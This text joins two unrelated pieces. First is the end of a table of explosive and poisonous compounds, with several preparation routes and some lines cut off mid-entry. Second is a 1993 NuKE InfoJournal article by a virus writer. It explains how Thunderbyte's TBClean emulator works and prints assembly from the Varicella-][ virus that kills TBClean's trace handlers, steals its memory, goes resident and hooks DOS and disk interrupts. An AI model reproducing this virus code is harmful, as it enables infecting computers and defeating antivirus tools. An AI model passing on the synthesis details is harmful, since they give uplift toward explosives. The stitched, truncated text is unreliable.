Manufacture:            N/A.  Cheaper and easier to buy as a mixture of
                        33% mercuric oxycyanide and 67% mercuric cyanide from
                        a chemical company.
Use:                    Topical antiseptic.
Toxicity (if known):    Violent poison.


Entry: 21

Name:                   Methyl Nitrate
IUPAC Name:             Nitric acid methyl ester
Condensed Formula:      CH3NO3 / CH3ONO2
Physical Properties:    Liquid.  Solid at -83 c, bp 64.6 c.  Slightly soluble
                        in water.  Soluble in alcohol, ether.
Explosive Properties:   When methyl nitrate reaches it boiling point, it
                        will explode.
Manufacture:            Prepared from methanol and nitric acid in the
                        presence of sulfuric acid.
Use:                    Has been used as a rocket propellant.  Does not need
                        external oxygen for combustion.
Toxicity (if known):    N/A


Entry: 22

Name:                   Nitramine, Tetralite, Tetryl.
IUPAC Name:             N-Methyl-N,2,4,6-tetranitrobenzenamine
Condensed Formula:      C7H5N5O8 / (NO2)3C6H2N(CH3)NO2
Physical Properties:    Yellow crystals.  Density of 1.57.  mp 130-132 c.
                        Insoluble in water, soluble in alcohol.
Explosive Properties:   Explodes at about 180-190 or on detonation.
Manufacture:            N/A
Use:                    As a pH indicator.  Also in explosives.
Toxicity (if known):    Irritating to skin and mucous membranes.  Causes
                        yellow staining to skin and hair.


Entry: 23

Name:                   Nitrogen Chloride
IUPAC Name:             Nitrogen trichloride
Condensed Formula:      Cl3N / NCl3
Physical Properties:    Yellow, thick, oily liquid.  Pungent odor, evaporates
                        rapidly in air.  Very unstable.  Insoluble in water.
Explosive Properties:   Explodes when heated to 93 c, subjected to a flash
                        of direct sunlight or magnesium liquid, sealed in a
                        glass container at 60 c after 13 seconds, frozen in
                        liquid air and thawed in vacuo, in contact with
                        ozone, nitric oxide, grease, and several organic
Manufacture:            Prepared by the action of chlorine gas on ammonium
                        salts, or by eletrolyzing an acidified solution of
                        ammonium chloride.
Use:                    Bleaching of flour (prohibited in the U.S.A.), 
                        wastage control of citrus fruit.
Toxicity (if known):    N/A


Entry: 24

Name:                   Nitrogen Selenide
IUPAC Name:             Selenium nitride
Condensed Formula:      N4Se4
Physical Properties:    Orange-red , amorphous powder or monoclinic crystals.
                        density 4.2.  Very hygroscopic.  Insoluble in water.
Explosive Properties:   Explosive.  Assumingly when quickly heated or struck.
Manufacture:            Prepared by passing dry ammonia over selenium 
                        tetrachloride; by treating a dilute solution of 
                        selenium oxychloride in benzene with dry ammonia and
                        washing the precipitate with water and potassium
                        cyanide;  by the action of dry ammonia on a dilute
                        solution of selenium monochloride in carbon
                        disulfide; by the action of dry ammonia on diethyl
                        selenite or dimethyl selenite dissolved in benzene
                        and washing with potassium cyanide; by reacting
                        anhydrous, liquid ammonia with selenium dioxide.
Use:                    N/A
Toxicity (if known):    N/A


Entry: 25

Name:                   Nitroguanidine
IUPAC Name:             Nitroguanidine
Condensed Formula:      CH4N4O2 / H2NC(NH)NHNO2
Physical Properties:    Needles, prisms from water.  One litre of water 
                        dissolves 4.4 grams at 25 c.  Slightly soluble in
Explosive Properties:   Explosive of moderate power.  Can only be exploded
                        with a detonator.
Manufacture:            Prepared by the action of concentrated H2SO4 on
                        guanidine nitrate.
Use:                    Intermediate in the synthesis of pharmaceuticals.
Toxicity (if known):    N/A


Entry: 26

Name:                   Pentaerythritol Tetranitrate, PETN
IUPAC Name:             2,2-Bis[(nitrooxy)-methyl]-1,3-propanediol dinitrate
Condensed Formula:      C5H8N4O12
Physical Properties:    Soluble in acetone.  Insoluble in water.
Explosive Properties:   Explodes on percussion.  More sensitive to shock than
Manufacture:            Prepared by the nitration of pentaerythritol.
Use:                    Mainly in the manufacture of detonating fuse 
                        (Primacord).  Also as a vasodilater.
Toxicity (if known):    N/A


Entry: 27

Name:                   Pentrinitrol
IUPAC Name:             2,2-Bis[(nitrooxy)methyl]-1,3-propanediol mononitrate
Condensed Formula:      C5H9N3O10
Physical Properties:    Viscous liquid.  mp 32 c.  Very soluble in ethanol.
Explosive Properties:   Explodes on percussion.  More sensitive to shock than
Manufacture:            N/A
Use:                    Vasodilator.
Toxicity (if known):    N/A


Entry: 28

Name:                   Pentryl
IUPAC Name:             2-[Nitro(2,4,6-trinitrophenyl)amino]-ethanol nitrate
Condensed Formula:      C8H6N6O11
Physical Properties:    Small, cream colored crystals.  mp 129 c.
Explosive Properties:   Explodes when heated to 235 c, or upon detonation.
Manufacture:            Prepared by the nitration of 2,4-dinitrophenylamino-
Use:                    High explosive.  Base charge in detonaters.
Toxicity (if known):    N/A


Entry: 29

Name:                   Peracetic Acid
IUPAC Name:             Ethaneperoxoic acid
Condensed Formula:      C2H4O3 / CH3COOOH
Physical Properties:    Liquid.  Acrid odor.  Freely soluble in water.
                        Stable in a dilute aqueous solution.
Explosive Properties:   Explodes violently upon heating to 110 c.
Manufacture:            Prepared from acetaldehyde and oxygen in the presence
                        of cobalt acetate; by the autooxidation of 
                        acetaldehyde.  A 50% solution may be obtained from
                        acetic anhydride, hydrogen peroxide, and sulfuric
Use:                    N/A
Toxicity (if known):    Strongly irritating to skin and eyes.


Entry: 30

Name:                   Performic Acid
IUPAC Name:             Methaneperoxoic acid
Condensed Formula:      CH2O3 / HCOOOH
Physical Properties:    The 90% solution is a colorless liquid.  Soluble in
                        chloroform, benzene.  Solutions are unstable, gassing
                        begin noticeable after a few hours.
Explosive Properties:   Prone to explode on contact with metals, their
                        oxides, reducing substances, or on distillation.
Manufacture:            A 90% solution is obtained when a mixture of 20 g
                        formic acid, 25g 100% H2O2, and 6.5 g H2SO4 is
                        allowed to interact for 2 hours, and is then
Use:                    For oxidation, epoxidation and hydroxylation 
Toxicity (if known):    Irritant.


Entry: 31

Name:                   Potassium Picrate
IUPAC Name:             2,4,6-Trinitrophenol potassium salt
Condensed Formula:      C6H2KN3O7
Physical Properties:    Yellow, reddish, or greenish lustrous needles.
                        Soluble in 200 parts cold water, 4 parts boiling
Explosive Properties:   Explodes when struck or heated.
Manufacture:            Prepared by reacting picric acid with potassium.
Use:                    N/A
Toxicity (if known):    N/A


Entry: 32

Name:                   Propargyl Nitrate
IUPAC Name:             2-Ethyl-2-[(nitrooxy)methyl]-1,3-propanediol 
                        dinitrate (ester)
Condensed Formula:      C6H11N3O9
Physical Properties:    White powder.  mp 51-52 c.  Readily soluble in 
                        acetone.  Insoluble in water.
Explosive Properties:   Lowest explosive temp: 220 c.  Explosive but only
                        slightly sensitive to shock.
Manufacture:            N/A
Use:                    Coronary vasodilator
Toxicity (if known):    N/A


Entry: 33

Name:                   n-Propyl Nitrate
IUPAC Name:             Nitric acid propyl ester
Condensed Formula:      C3H7NO3 / CH3CH2CH2ONO2
Physical Properties:    Pale yellow liquid.  Sweet sickly odor.  bp 110 c.
                        Azetrope with water containing 75% C3H7NO3.
Explosive Properties:   Heating may cause it to explode.
Manufacture:            Prepared by the nitration of propanol with nitric
                        acid, usually in the presence of urea and ammonium
                        nitrate or sulfuric acid.
Use:                    Fuel ignition promoter, in rocket fuel formulations.
Toxicity (if known):    N/A


Entry: 34

Name:                   Silver Perchlorate
IUPAC Name:             Silver Perchlorate
Condensed Formula:      AgClO4
Physical Properties:    Deliquescent crystals.  Freely soluble in water.
Explosive Properties:   These compounds explode readily when struck.
Manufacture:            Prepared from NOClO4 + AgBr.
Use:                    In the explosives industry.
Toxicity (if known):    Irritating to skin, mucous membranes.


Entry: 35

Name:                   Tetranitromethane
IUPAC Name:             Tetranitromethane
Condensed Formula:      CN4O8 / C(NO2)4
Physical Properties:    Pale yellow liquid.  mp +13.8 c.  Freely soluble in
                        alcohol.  Insoluble in water.
Explosive Properties:   Explosive in admixture with toluene.  Highly 
                        explosive in the presence of impurities.
Manufacture:            Prepared by the nitration of acetic anhydride with
                        anhydrous nitric acid.
Use:                    Oxidizer in rocket propellants.  To increase centane
                        number of diesel fuels.  Reagent for detecting the
                        presence of double bonds in organic compounds.  Has
                        bee proposed as irritant war gas.
Toxicity (if known):    Skin and lung irritant.


Entry: 36

Name:                   Tetrasilane
IUPAC Name:             Tetrasilicon
Condensed Formula:      H10Si4 / Si4H10
Physical Properties:    Liquid. mp approx -90 c, bp 109 c.  Decomposes at
                        room tempature.
Explosive Properties:   Explodes on exposure to air.
Manufacture:            Prepared by the action of hydrochloric acid on 
                        magnesium silicide.
Use:                    N/A
Toxicity (if known):    N/A


Entry: 37

Name:                   Tetrasulfur Tetranitride
IUPAC Name:             Tetrasulfur Tetranitride
Condensed Formula:      N4S4
Physical Properties:    Orange-red, monoclinic needles.  mp 178 c.  Insoluble
                        in cold water.  Slightly soluble in benzene.
Explosive Properties:   Heating above 185 c may result in deflagration and
                        explosion.  May decompose explosivly on striking
                        or at tempatures much above 100 c.
Manufacture:            Prepared by the interaction of disulfur dichloride 
                        and ammonia.
Use:                    N/A
Toxicity (if known):    N/A


Entry: 38

Name:                   sym-Trinitrobenzene
IUPAC Name:             1,3,5-Trinitrobenzene
Condensed Formula:      C6H3N3O6
Physical Properties:    mp 122.5 c.  Trinitrobenzene is dimorphous, the other
                        rare form melts at 61 c.
Explosive Properties:   Explodes when rapidly heated.  Less sensitive to
                        impact than TNT, but more powerful and brisant.
Manufacture:            Prepared by decarboxylation of trinitrobenzoic acid,
                        obtained by oxidation of TNT.
Use:                    Explosives.
Toxicity (if known):    N/A


Entry: 39

Name:                   Trinitromethane
IUPAC Name:             Trinitromethane
Condensed Formula:      CHN3O6
Physical Properties:    Crystals, mp 15 c.  Decomposes above 25 c.  Soluble
                        in water, giving an intense yellow solution, although
                        the dry crystals are pure white.
Explosive Properties:   Explodes when heated rapidly.
Manufacture:            Prepared by nitration of acetylene with nitric acid.
                        Prepared from tetranitromethane and K4[Fe(CN6)] in
                        an aqueous solution.
Use:                    In the manufacture of explosives and rocket
Toxicity (if known):    Slightly irritating to eyes, mucous membranes.


Entry: 40

Name:                   Uranyl Nitrate
IUPAC Name:             Uranyl Nitrate
Condensed Formula:      N2O8U / UO2(NO3)2
Physical Properties:    Hexahydrate, yellow crystals; greenish luster by
                        relected light.  When shaken, rubbed, or crushed,
                        the crystals show remarkable tribolum inescence with
                        occasional detonations.
Explosive Properties:   Solutions should not be allowed to stand in sunlight
                        as explosions may occur.  Shaking, rubbing, or 
                        crushing may result in detonation.
Manufacture:            N/A
Use:                    Ad intensifier in photography; manufacture uranium
                        glaze; decorating porcelain; also as reagent in 
                        anal. chemistry.
Toxicity (if known):    N/A


          uK                                                       E-
          E-   "The Dangers of Thunderbyte's TBClean Emulation     Nu
          Nu                     Techniques"                       KE
          KE                                                       -N
          -N                         By                            uK
          uK                     Rock Steady                       E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% AntiVirus Spotlight of the Issue - Thunderbyte Anti-Virus v6.04 %


This article is concerning a study and field test of the reliability of
Thunderbyte's anti-virus package. The study was conducted by Rock Steady,
and this is simply a report about his extensive study of Thunderbyte's
TBClean utility. This report is not intended to scare people away from
Thunderbyte's anti-virus package, but rather to show you how TBClean
actually works in order to clean a virus. The information here may disturb
many people, nevertheless it is presented here for the safety of those who
use Thunderbyte's TBClean in a home and/or business environment.

% What is ThunderByte %

Thunderbyte is an anti-virus package, sometimes known as TBAV for ThunderByte
Anti-Virus. TBAV tries to use fairly new techniques to try to detect and clean
computer viruses. In this issue of the NuKE InfoJournal, we will take a
very close look at the structure of TBAV, mainly the utility TBCLEAN.EXE
which is supplied in every TBAV package.

TBCLEAN.EXE is a program that tries to remove viruses from your infected
files by using an heuristic/emulation approach. Now, for those who don't
understand what an heuristic/emulation approach is let me try to explain
it to you in more simplified, less-technical terms.

TBClean will try to set up a "control" environment to execute the virus. You
see, many of the computer viruses today will attach themselves to binary files
and alter them in such a way that when you try to execute (run) the binary
file the virus will execute first and install itself into memory, and then
the virus will execute the original binary file it is attached to. Now, every
????????.COM and ????????.EXE binary file contains an entry point. This is the
point from which DOS to starts to execute the code. Basically it is
the beginning of the program, and in order for the file to run properly we
need to start at that entry point. Now *.COM files contain a FIXED entry point
which is location 100h. Now if we attach a virus to the end of the COM file,
we have to fix the entry point so that when executed the virus will run
first. Since this is a FIXED entry point, we will go to location 100h, and
put a JMP statement to jump to the entry point of the virus. For the
original file to execute correctly, we will need the original three bytes
at the entry point, since the JMP we put for it to jump to the virus entry
point took three bytes of data in the .COM. So when the virus gives control
back to the file, we then must restore the original three bytes and execute

Now to remove the virus from the .COM file we need to know where the original
three bytes are. So TBClean will actually execute the virus and try to catch
the virus restoring the original three bytes. Once that happens, TBClean can
safely remove the virus from the file, as it now can replace the original
three bytes where the virus put its jump statement.

Now .EXEs have a variable entry point, rather than a fixed one like the .COM
files.  Each .EXE file contains a header of about 32 bytes in the beginning
of the file which has information about the .EXE itself, including the entry
point. Now when a virus attaches (infects) itself to an .EXE file, it simply
puts its entry point inside the .EXE header and saves the original one for
later use.

Again, in order to remove a file from an .EXE file, we will need to have the
original entry point location. And TBClean does this by executing the virus
in a controlled environment; when the virus restores control back to the
.EXE file, it will jump to the entry point location. TBClean will halt
at that point and attempt to clean the file.

% The Problem %

The problem when doing this, the virus can always escape from this controlled
environment and go loose. In fact we at NuKE have attempted and succeeded in
doing just that!

% Explanation %

When you run TBClean to disinfect a virus-infected file, it does several
things in order to set up the environment needed to execute the virus. One of
things that TBClean does is check to see if it is being debugged.

I guess the makers of TBClean did not want people to "debug" their software
in order to have a closer look because once you know how the program works
you then can attempt to bypass it. The easiest way to bypass the anti-debug
traps is to use a debugger package that can go TSR and put loose breakpoints.
I've found that Periscope and SoftIce can easily bypass the TBClean traps,
or you may set a TSR file and set it to go off on the first interrupt 21h,
function 3Dh (DOS Open File).

The next main trick TBClean does is that it occupies all of the remaining
memory left in the system. TBClean only requires about 20k for itself, but
nevertheless it will occupy all the remaining memory left in the system. It
will use this memory for the file it will attempt to clean, but not all of the
memory is really needed, nevertheless it is occupied. Why? Well, because
TBClean wants to set-up a secure environment to run the virus and by occupying
all the available memory if the virus gets out of hand it CAN'T go resident
because there is no more memory left! "Pretty smart," you must be saying to
yourself? Yes, it is a good idea to occupy all of the memory, so like even if
the virus tries to allocate memory it will get an error and it will quit.

The next trick, before TBClean actually executes the virus in the controlled
environment is that it will make two copies of the interrupt vector table.
This too is a good idea, because if a virus does manage to escape and hook the
vector table, TBClean will notice the vector table change and restore it
with the original value. Therefore, if a virus was to "get out" of this
controlled TBClean environment we would need to hook all three copies of the
vector tables (DOS + the two copies that TBClean makes).

After this, we are pretty much ready to try to make a disinfection via
emulation. Of course TBClean turns on the Trap flag, and uses Int 0h, 1h, 3h,
and 4h to do the actual tracing. The interrupt that we REALLY need to pay
attention to is Int 1h. Why? Well, when Intel built the first 80x86 (the 8086)
they added what we call a Trap Flag. Normally this flag is off, and the
processor executes every line of code without stoping. But when the trap flag
is on, the processor will issue an Int 1h call after every line of code
executed. Therefore, after every line of code is executed the processor will
issue an Int 1h, which TBClean quietly awaits -- then it can actually analyze
the code line by line.

There are a few restrictions that TBClean enforces; one of them is the Trap
flag must always be on! If you try to turn off the Trap flag, TBClean will
fool the virus into thinking the Trap flag is off, but it really stays on.
Secondly, interrupt calls are not allowed. Thirdly, it will never give you
the true vector address of Int 1h or Int 3h -- it gives you a fake value
instead. Finally, TBClean will NOT allow the virus to have its segment in
the DS or ES registers, meaning that if TBClean resided in location 0ABC:0000,
the value 0ABC is never allowed to go in the DS or ES registers of the virus.
This is done so the virus is not able to snoop inside TBClean.

% Making a virus to bypass TBClean %

After I had successfully taken apart TBClean, and once I understood exactly
how it worked, then I was ready to write a virus to defeat TBClean's
dangerous emulation techniques.

Don't get me wrong, TBClean has a great idea going, but it contains too many
flaws that must be tightened up. And apparently those flaws can lead to the
destruction of your PC. Just think about it. Let's say you just downloaded a
file from your local BBS, and you used TBSCAN to scan the new file for viruses,
before you attempt to execute it. Lets say the file is infected with a virus
like Varicella-][, which can bypass TBClean. Now if TBSCAN reported a virus,
wouldn't you naturally try to clean it so you could perhaps use the file? Of
course you would, and what program would you use to do the job? Nothing but

Picture it, your computer is not infected by any virus, you are pretty much
happy about yourself for using TBSCAN and detecting that virus inside that
file you just downloaded. Your glad you got it before it infected your
computer. Or lets say you got TBScanX resident, and it caught the virus, just
as you attempt to executed it... You now try to clean the file with TBClean.
TBClean does what it has to do, looks at the file and then tries emulation to
disinfect it. After emulation TBClean reports no viruses found, and tells you
that it may not even be infected with a virus.

You're puzzled? Well, actually TBClean just unleased the virus into your
system! Now who's to blame? Personally, I think it's the incompetent
programmers of TBClean. It allowed too many loopholes in their program, and
the Varicella-][ virus just took advantage of those loopholes and is now
resident in your computer, ready to infect every file you touch. Remember, it
is also a very fast, stealthy virus.

Personally, if _any_ anti-virus program should attempt to disinfect via
emulation, it must be EXTREMELY cautious, and it should take every
possible loophole into account. Remember, emulation means that you are
actually executing the virus in order to disinfect it. Many people didn't
know that, but TBClean executes (RUNS) the virus! How Satanic! Thunderbyte
should praise NuKE for testing their software and showing them their flaws, so
that they may do whatever is necessary to fix this problem.

It is fortunate for Thunderbyte that no "evil" virus writer has noticed
this problem and took advantage of it. It would have cost Thunderbyte
their name and market share.

Anyhow, enough with Thunderbyte, this package has enough flaws. It is sad
that Thunderbyte rated very low under NuKE's personal attack tests in several

Thunderbyte reported too many false positives, meaning it screamed *VIRUS*
when no virus was present. It is enough that the average computer user is
paranoid about viruses, but if you "cry wolf" too many times people lose hope
in the package.

Thunderbyte was incapable of working in a DOS Window shell, in SCO Unix, and
under OS/2. This seems to be because TBSCAN uses its own file routines, instead
of DOS's.

Thunderbyte is also not very user friendly -- 4 out of 5 moms found this
package too difficult to use. A Windows version of Thunderbyte could
be a great plus.

% And in this corner...Varicella-][ %

Let's go into detail with parts of the Varicella-][ virus and let's show you why
it works.

     1          mov     byte ptr cs:[tb_here][bp],00h   ;Reset TB flag
     2          xor     dx,dx                           ;dx=0
     3          mov     ds,dx                           ;ds=0
     4          mov     ax,word ptr ds:[0006h]          ;ax=0000:0006 segment of
     5          dec     ax
     6          mov     ds,ax

Okay, after looking at the above we begin by resetting our TB flag. TBClean
will not give us the complete address of Int 1h. It will only give us the
correct segment, the offset is no good. Therefore let's simply take the segment.
Now we know the segment location of TBClean in memory, since TBClean will
not let me store the value in DS, let's subtract 1 and *then* store it in DS.
We have again fooled TBClean; maybe we can't have TBClean's correct segment
in DS, but by subtracting 1 and adding 16 to IP, we get the exact location.

In the next block of code, we will search 64k of TBClean's memory in order to
find the Int 1h and 3h offsets and the two copies of the vector table. This is
the bit of data we will be searching for.

====================Somewhere in TBClean.EXE==v6.04===================
 1 cs:04A4  33C0                xor     ax,ax
 2 cs:04A6  8ED8                mov     ds,ax
 3 cs:04A8  8BF8                mov     si,ax
 4 cs:04AA  BF342D              mov     di,2D34
 5 cs:04AD  B90002              mov     cx,0200
 6 cs:04B0  F3A5                rep movsw

[The above block is coping the vector table (0000:0000) to location
 ES:DI (ES:2D34). This value we will need.]

 7 cs:04B2  FA                  cli
 8 cs:04B3  C70600005411        mov     word ptr [0000],1154
 9 cs:04B9  8C0E0200            mov     [0002],cs
10 cs:04BD  C7060400E513        mov     word ptr [0004],13E5
11 cs:04C3  8C0E0600            mov     [0006],cs
12 cs:04C7  C7060C006B15        mov     word ptr [000C],156B
13 cs:04CD  8C0E0E00            mov     [000E],cs
14 cs:04D1  C70610005411        mov     word ptr [0010],1154
15 cs:04D7  8C0E1200            mov     [0012],cs
16 cs:04DB  C70614005411        mov     word ptr [0014],1154
17 cs:04E1  8C0E1600            mov     [0016],cs
18 cs:04E5  C70618005411        mov     word ptr [0018],1154
19 cs:04EB  8C0E1A00            mov     [001A],cs
20 cs:04EF  C7066C002411        mov     word ptr [006C],1124
21 cs:04F5  8C0E6E00            mov     [006E],cs
22 cs:04F9  FB                  sti

[The above block is hooking the vector table. This is were we get our
 Int 1h and 3h location.]

23 cs:04FA  8BF0                mov     si,ax
24 cs:04FC  8BF8                mov     di,ax
25 cs:04FE  2E8E06F032          mov     es,cs:[32F0]
26 cs:0503  B90080              mov     cx,8000
27 cs:0506  F3A5                rep movsw

[The above block copies 8000 bytes (vector table, CMOS, BIOS, etc.) into
 the segment which is in location CS:32F0. We will need to get this
 location to hook the interrupts.]
===========================END of TBClean=============================

Now, the bellow block will start to search for the above block in memory
where we will scan 64k from the segment we got.

                mov     cx,0FFFFh                       ;cx=64k
                mov     si,dx                           ;si=0

look_4_TBClean: mov     ax,word ptr ds:[si]
                xor     ax,0A5F3h

[You could do a "CMP   WORD PTR DS:[SI],0A5F3h", I just wanted to be sneaky
 because TBClean will find out what I'm doing and fool around with the
 flag and my test will fail! As you can see, we are looking for the bytes
 from line #6. We search by REVERSE-BIT format! To find F3A5 we search with
                je      check_it                        ;jmp if its TBClean
look_again:     inc     si                              ;if not continue looking
                loop    look_4_TBClean
                jmp     not_found                       ;not found cont normal

[If A5F3 is found, we continue with the bottom, which will search for more bytes
 in that block captured above. These bytes that we are searching for exist
 in all version of TBClean v6.00-6.04. I haven't test bellow v6.00, but it
 should work!]

check_it:       mov     ax,word ptr ds:[si+4]
                xor     ax,0006h
                jne     look_again                      ;jmp =! TBClean
                mov     ax,word ptr ds:[si+10]
                xor     ax,020Eh
                jne     look_again                      ;jmp =! TBClean
                mov     ax,word ptr ds:[si+12]
                xor     ax,0C700h
                jne     look_again                      ;jmp =! TBClean
                mov     ax,word ptr ds:[si+14]
                xor     ax,0406h
                jne     look_again                      ;jmp =! TBClean

[If all the bytes match, it means we found TBClean in memory, and since we
 know where we are, we can steal the Int 1h & 3h locations, like we do
                mov     bx,word ptr ds:[si+17]          ;steal REAL int 1 offset

[Now that we have the offset of Int 1h in BX, replace the first byte at Int 1h
 handler with CF (IRET), making the handler Useless! NOTE: we are adding 16 to
 the offset because the segment is really DS - 1, so to counter act the segment
 we add 16 to the offset. (16 bytes = 1 segment)]

                mov     byte ptr ds:[bx+16],0CFh        ;replace with IRET

[Same is done for Int 3h bellow.]

                mov     bx,word ptr ds:[si+27]          ;steal REAL int 3 offset
                mov     byte ptr ds:[bx+16],0CFh        ;replace with IRET

[TBClean is OFFICIALLY DEAD! Congrats, now lets turn on the flag, cause we
 found TBClean, and let's go resident]

                mov     byte ptr cs:[tb_here][bp],01h   ;set the TB flag on

[The next block gets the segment of where the 2nd copy of the vector table
 is hiding (line #25 in TBClean capture)!]

                mov     bx,word ptr ds:[si+51h]         ;get 2nd segment of ints
                mov     word ptr cs:[tb_int2][bp],bx    ;vector table

[The next block gets the offset of the 1st copy of the vector table that
 TBClean did (line #4 in TBClean capture).]

                mov     bx,word ptr ds:[si-5]           ;get offset of 1st copy
                mov     word ptr cs:[tb_ints][bp],bx    ;of vector table

[Now we can get the real Int 21h, 13h,and 1Ch locations from the vector table.]

not_found:      xor     dx,dx
                push    ds
                mov     ds,dx                           ;put that in ds
                les     si,dword ptr ds:[0084h]         ;get int21 vector
                mov     word ptr cs:[int21][bp],si      ;save int21 offset
                mov     word ptr cs:[int21+2][bp],es    ;save int21 segment

                les     si,dword ptr ds:[0070h]         ;get int1c vector
                mov     word ptr cs:[int1c][bp],si      ;save int1c offset
                mov     word ptr cs:[int1c+2][bp],es    ;save int1c segment

                les     si,dword ptr ds:[004ch]         ;get int13 vector
                mov     word ptr cs:[int13][bp],si      ;save int13 offset
                mov     word ptr cs:[int13+2][bp],es    ;save int13 segment
                pop     ds

                mov     byte ptr cs:[mcb][bp],00h       ;reset the TB mcb flag
                mov     ax,0abcdh                       ;test if virus is here?
                int     13h
                cmp     bx,0abcdh                       ;is it?
                jne     install_virus                   ;jmp, if not & install
leave_mcb:      jmp     exit_mem                        ;yes, leave then

[This is the tricky part! Remember TBClean occupies ALL available memory!
 So I had to come up with a routine that would work when TBClean was NOT in
 memory, and when it was! The task was hard...but I did it (naturally, hehe).

 TBClean *NOT* in memory: If TBClean is not in memory, then we start at location
 "install_virus" and we get the List of Lists, and we get the FIRST MCB chain
 and basically we chain through until we find the END of the MCB chain, which
 ends with a "Z" instead of an "M". Once we find the last chain we subtract
 the virus size in paragraphs, and that's it...

 TBClean in memory: If TBClean is in memory when the virus finds the LAST
 MCB block and tries to subtract its size from it, it will notice that
 not enough memory is available. Where then will jump to "steal_some."

 What "steal_some" does is it will REPEAT the process again. Meaning it will
 now get the FIRST MCB chain, and chain through the end, but while its chaining
 through the MCB, it will look for the MCB that belongs to TBClean!!! Once we
 find the MCB that belongs to TBClean we will subtract the virus size in
 paragraphs from it and voila -- we stole and allocated memory while bypassing
 TBClean!!! And now we can safely return to TBClean without worrying if it will
 de-allocate our memory space.]

;--------- Going Resident ------

steal_some:     mov     al,byte ptr cs:[mcb][bp]        ;if tb is here, steal
                cmp     al,0ffh                         ;memory from it!
                je      leave_mcb                       ;error? exit then
                inc     byte ptr cs:[mcb][bp]           ;inc flag
                cmp     al,01                           ;
                ja      mcb3_1

install_virus:  mov     ah,52h                          ;get the list of lists
                int     21h                             ;use dos
                mov     ax,es:[bx-2]                    ;get first mcb chain

                mov     es,ax                           ;es=segment of 1st mcb
mcb1:           cmp     byte ptr es:[0000h],'Z'         ;is it the last mcb
                jne     mcb2                            ;jmp if not
                clc                                     ;yes last mcb, CLC
                jmp     short mcbx                      ;outta here

mcb2:           cmp     byte ptr es:[0000h],'M'         ;is it in the chain
                je      mcb3                            ;jmp if yes
                stc                                     ;error, set carry flag
                jmp     short mcbx                      ;outta here

[The bellow block is special! Meaning if the TB flag is on, we will compare
 ALL of the MCB block owners to find the one that belongs to TBClean! Since
 we already know the segment of TBClean, we subtract 100h (256) bytes and we
 have its PSP area. Since DS = segment - 1, we will do DS = segment - 9, since
 we  already subtracted 1 from the beginning!]

mcb3:           cmp     byte ptr cs:[mcb][bp],0         ;is TB flag off?
                je      mcb3_1                          ;if yes, then jmp
                mov     dx,ds                           ;else cmp TB ds
                sub     dx,9h                           ;ds-10
                cmp     word ptr es:[0001h],dx          ;cmp to mcb owner.
                je      mcbx_1

mcb3_1:         mov     ax,es                           ;ax=es
                add     ax,word ptr es:[0003h]          ;ax=es + next mcb
                inc     ax                              ;get mcb
                mov     es,ax                           ;es=ax:next mcb chain
                jmp     short mcb1                      ;goto first step

mcbx:           jc      leave_mcb                       ;if error, exit
mcbx_1:         cmp     word ptr es:[0003],(virus_size/16) + 11h
                jb      steal_some
                mov     byte ptr es:[0000],'Z'          ;the last mcb chain!
                sub     word ptr es:[0003],(virus_size/16) + 11h
                add     ax,word ptr es:[0003h]          ;figure out segment
                inc     ax                              ;add 16 bytes
                mov     es,ax                           ;new segment in es
                mov     di,103h                         ;offset is 103h

[Now we have some memory! Let's move a copy of the virus into that newly
 allocated memory under the TOM!]

                push    ds                              ;save TB ds location
                push    cs
                pop     ds                              ;virus cs=ds
                mov     si,offset init_virus            ;si=top of virus
                add     si,bp                           ;add delta
                mov     cx,virus_size                   ;move virus_size
                cld                                     ;clear direction flag
                repne   movsb                           ;do it Mr. Crunge

[Now we will hook the DOS Vector table (0000:0000->0000:0200).]

                mov     ds,cx                           ;ds=0000
hook_again:     cli                                     ;disable ints
                mov     word ptr ds:[0084h],offset int21_handler     ;hook int21
                mov     word ptr ds:[0086h],es
                mov     word ptr ds:[0070h],offset int1c_handler     ;hook int1c
                mov     word ptr ds:[0072h],es
                mov     word ptr ds:[004ch],offset int13_handler     ;hook int13
                mov     word ptr ds:[004eh],es
                sti                                     ;enable ints

[We will test if the TBClean flag is on! If TBClean flag is on, we will make
 DS = "segment of 2nd copy of vector table in TCLEAN" and hook it!]

                cmp     byte ptr cs:[tb_here][bp],00h   ;was TB found?
                je      go_on                           ;no, then jmp
                cmp     cl,01h                          ;is this the 2nd x here?
                je      go_on                           ;yes, then jmp
                mov     ds,word ptr cs:[tb_int2][bp]    ;get TB int segment
                inc     cl                              ;inc cl
                jmp     short hook_again                ;hook ints again

[If TBClean was found the bellow block will now hook the last copy of the
 vector table that TBClean did...]

go_on:          pop     ds                              ;get TB code segment
                cmp     byte ptr cs:[tb_here][bp],01h   ;TB here?
                je      hook_tb_ints                    ;yes, then jmp
                jmp     exit_mem                        ;else exit
hook_tb_ints:   mov     si,word ptr cs:[tb_ints][bp]    ;get TB int offset
                mov     word ptr ds:[si+84h+16],offset int21_handler
                mov     word ptr ds:[si+86h+16],es
                mov     word ptr ds:[si+70h+16],offset int1c_handler
                mov     word ptr ds:[si+72h+16],es
                mov     word ptr ds:[si+4ch+16],offset int13_handler
                mov     word ptr ds:[si+4eh+16],es

[ALL DONE!!! Now we restore to the original file!

 So how does it feel to fool TBClean??? Article #11 contains the complete
 source code of the Varicella-][ virus. You may test it as you wish!]

exit_mem:       pop     ds
                pop     es
                pop     si
                cmp     word ptr cs:[buffer][bp],5A4Dh  ;.exe file?
                je      exit_exe_file                   ;yupe exit exe file
                cmp     word ptr cs:[buffer][bp],4D5Ah  ;.exe file?
                je      exit_exe_file                   ;yupe exit exe file
                push    cs
                pop     ds
                mov     bx,offset buffer                ;get first 3 bytes
                add     bx,bp                           ;fix delta
                mov     ax,[bx]                         ;move first 2 bytes
                mov     word ptr ds:[100h],ax           ;put em in the beginning
                inc     bx                              ;inc pointer
                inc     bx
                mov     al,[bx]                         ;get last of 3rd byte
                mov     byte ptr ds:[102h],al           ;put that in place
                pop     dx
                pop     cx
                pop     bx
                pop     word ptr cs:[ax_reg][bp]        ;save ax else where
                mov     ax,100h
                push    ax                              ;fake a CALL & RETN
                mov     ax,word ptr cs:[ax_reg][bp]     ;put ax as normal
                retn                                    ;link to 100h

exit_exe_file:  mov     dx,ds                           ;get psp=ds seg
                add     dx,10h                          ;add 16bytes to seg
                pop     word ptr cs:[ax_reg][bp]
                pop     cx
                pop     bx
                pop     ax
                add     word ptr cs:[buffer+22][bp],dx  ;fix segments
                add     dx,word ptr cs:[buffer+14][bp]
                mov     ss,dx                           ;restore ss
                mov     sp,word ptr cs:[buffer+16][bp]  ;and sp
